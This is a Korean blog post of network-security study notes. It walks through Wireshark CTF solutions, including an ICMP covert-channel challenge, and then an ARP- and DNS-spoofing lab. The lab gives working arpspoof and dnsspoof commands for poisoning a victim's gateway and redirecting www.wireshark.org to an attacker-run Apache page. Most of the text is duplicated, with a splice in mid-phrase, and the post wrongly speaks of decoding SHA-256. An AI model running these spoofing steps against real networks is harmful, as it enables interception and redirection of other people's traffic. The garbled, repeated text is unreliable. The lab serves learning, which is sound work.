wireshark에서 Statistics라는 메뉴에서 conversation을 이용하면 어떤 것이 얼마나 패킷을 보냈는지 알 수 있기 때문에 많이 보낸 것에 대해서 찾아보면 쉬울것이다.
conver-channel ( 은닉 채널 )
정보를 전송하기 위해 설계된 것이 아니거나 의도하지 않은 통신채널, 일반적으로 통신채널의 주체에게는 보여지지 않는 개체를 사용하는 채널이다.
기본채널에 기생하는 통신 채널
ICMP convert Channel을 사용한다.
conver-channel문제는 은닉 채널이라는 것을 이용하기 때문에 ICMP를 검색해야 한다. ICMP를 검색해 패킷을 보다보면 문자열을 주고 받는데 ( cat, id 명령어 사용 ) 여기서 readme라는 파일을 cat으로 여는데 여기서 나온 문자열을 쭉 읽다보면 so my massage라는 말이 나오고 그 뒤에 암호화된 것들이 나오는데 base64 decoding사이트에서 decoding을 시킨 뒤 나온것을 다시 복호화 해야하는데 mdhashing사이트에서 sha256으로 다시한번 decode를 하면 제대로 된 답이 나온다.
#암호화 된 것 뒤에 ==이 붙으면 base64를 떠올리자
tf문제는 frame contains flag를 하면 20개의 TCP패킷이 나오는데 tcp stream으로 확인해보면 각각 입력을 하고 응답을 받는데, F와 T값을 돌려받는다 이중에 T응답을 받은 문자만 남겨뒀다가 조합하면된다.
( 20개의 패킷에서 T값을 받은 문자만 골라내야하니 사실상 노가다 문제 )
spoofing attack
ARP 스푸핑(ARP spoofing)은 근거리 통신망(LAN) 하에서 주소 결정 프로토콜(ARP) 메시지를 이용하여 상대방의 데이터 패킷을 중간에서 가로채는 중간자 공격 기법이다.
공격자가 의도적으로 특정 IP 주소와 자신의 MAC 주소로 대응하는 ARP 메시지를 발송하면, 그 메시지를 받은 장비는 IP 주소를 공격자 MAC 주소로 인식하게 되고, 해당 IP 주소로 보낼 패킷을 공격자로 전송하게 된다. 이 때 공격자는 그 패킷을 원하는 대로 변조한 다음 원래 목적지 MAC 주소로 발송하는 공격을 할 수도 있다.
spoofing 공격 실습
자신의 ip와 mac addr 그리고 피해자의 ip와 gateway ip를 알아낸다.
arp -a와 ifconfig 사용
arpspoof -i eth0 -t [ 피해자 ip ] [피해자의 gateway ip ] 피해자의 컴퓨터가 공격자를 gateway라고 인식하게 만든다
으로 피해자의 gateway를 자신의 mac addr로 오염시킬수 있다.
어떤 주소로 들어갈 떄 주소를 변조하기 위해 apt-get install apache2로 아파치를 이용한다.
그 후 netstat -ant로 80port가 열려있는지 확인하고 안열려있다면 apache2가 실행되고 있지 않다는 뜻으로 service apache2 start로 아파치를 실행시켜준다.
cd /var/www/html에서 index.html파일을 rm index.html을 한 뒤 echo "Attacker" > index.html로 바꿔준다 .
( 공격자가 변조하여 넘겨줄 곳을 설정 )
service apache2 restart , 아파치 재시작, 파일을 하나 더 만든다.
echo " 공격자의 ip * www.wireshark.org" > dns.hosts
dnsspoof공격을 한다.
dnsspoof -i eth0 -f ./dns.hosts( 원하는 파일 경로 )
네트워크 관련 도서 :
와이어샤크를 활용한 실전 패킷 분석 1~3
네트워크 해킹서 Statistics라는 메뉴에서 conversation을 이용하면 어떤 것이 얼마나 패킷을 보냈는지 알 수 있기 때문에 많이 보낸 것에 대해서 찾아보면 쉬울것이다.
conver-channel ( 은닉 채널 )
정보를 전송하기 위해 설계된 것이 아니거나 의도하지 않은 통신채널, 일반적으로 통신채널의 주체에게는 보여지지 않는 개체를 사용하는 채널이다.
기본채널에 기생하는 통신 채널
ICMP convert Channel을 사용한다.
conver-channel문제는 은닉 채널이라는 것을 이용하기 때문에 ICMP를 검색해야 한다. ICMP를 검색해 패킷을 보다보면 문자열을 주고 받는데 ( cat, id 명령어 사용 ) 여기서 readme라는 파일을 cat으로 여는데 여기서 나온 문자열을 쭉 읽다보면 so my massage라는 말이 나오고 그 뒤에 암호화된 것들이 나오는데 base64 decoding사이트에서 decoding을 시킨 뒤 나온것을 다시 복호화 해야하는데 mdhashing사이트에서 sha256으로 다시한번 decode를 하면 제대로 된 답이 나온다.
#암호화 된 것 뒤에 ==이 붙으면 base64를 떠올리자
tf문제는 frame contains flag를 하면 20개의 TCP패킷이 나오는데 tcp stream으로 확인해보면 각각 입력을 하고 응답을 받는데, F와 T값을 돌려받는다 이중에 T응답을 받은 문자만 남겨뒀다가 조합하면된다.
( 20개의 패킷에서 T값을 받은 문자만 골라내야하니 사실상 노가다 문제 )
spoofing attack

ARP 스푸핑(ARP spoofing)은 근거리 통신망(LAN) 하에서 주소 결정 프로토콜(ARP) 메시지를 이용하여 상대방의 데이터 패킷을 중간에서 가로채는 중간자 공격 기법이다.
공격자가 의도적으로 특정 IP 주소와 자신의 MAC 주소로 대응하는 ARP 메시지를 발송하면, 그 메시지를 받은 장비는 IP 주소를 공격자 MAC 주소로 인식하게 되고, 해당 IP 주소로 보낼 패킷을 공격자로 전송하게 된다. 이 때 공격자는 그 패킷을 원하는 대로 변조한 다음 원래 목적지 MAC 주소로 발송하는 공격을 할 수도 있다.
spoofing 공격 실습
자신의 ip와 mac addr 그리고 피해자의 ip와 gateway ip를 알아낸다.
arp -a와 ifconfig 사용
arpspoof -i eth0 -t [ 피해자 ip ] [피해자의 gateway ip ] 피해자의 컴퓨터가 공격자를 gateway라고 인식하게 만든다
으로 피해자의 gateway를 자신의 mac addr로 오염시킬수 있다.
어떤 주소로 들어갈 떄 주소를 변조하기 위해 apt-get install apache2로 아파치를 이용한다.
그 후 netstat -ant로 80port가 열려있는지 확인하고 안열려있다면 apache2가 실행되고 있지 않다는 뜻으로 service apache2 start로 아파치를 실행시켜준다.
cd /var/www/html에서 index.html파일을 rm index.html을 한 뒤 echo "Attacker" > index.html로 바꿔준다 .
( 공격자가 변조하여 넘겨줄 곳을 설정 )
service apache2 restart , 아파치 재시작, 파일을 하나 더 만든다.
echo " 공격자의 ip * www.wireshark.org" > dns.hosts
dnsspoof공격을 한다.
dnsspoof -i eth0 -f ./dns.hosts( 원하는 파일 경로 )
과
도서 추천
네트워크 관련 도서 :
와이어샤크를 활용한 실전 패킷 분석 1~3
네트워크 해킹과 보안
심도있는 공부를 위한 도서 :
computer Networking: A Top-Down Approach
프로그래밍 :
TCP/IP 소켓 프로그래밍
'Hacking > 네트워크' 카테고리의 다른 글
| 교육 내용 3 (0) | 2019.08.31 |
|---|---|
| 네트워크_교육내용_2 (0) | 2019.08.26 |
| packet [ 패킷 ] (0) | 2019.08.25 |
| Protocol (0) | 2019.08.25 |
| Network_Basic (0) | 2019.08.24 |
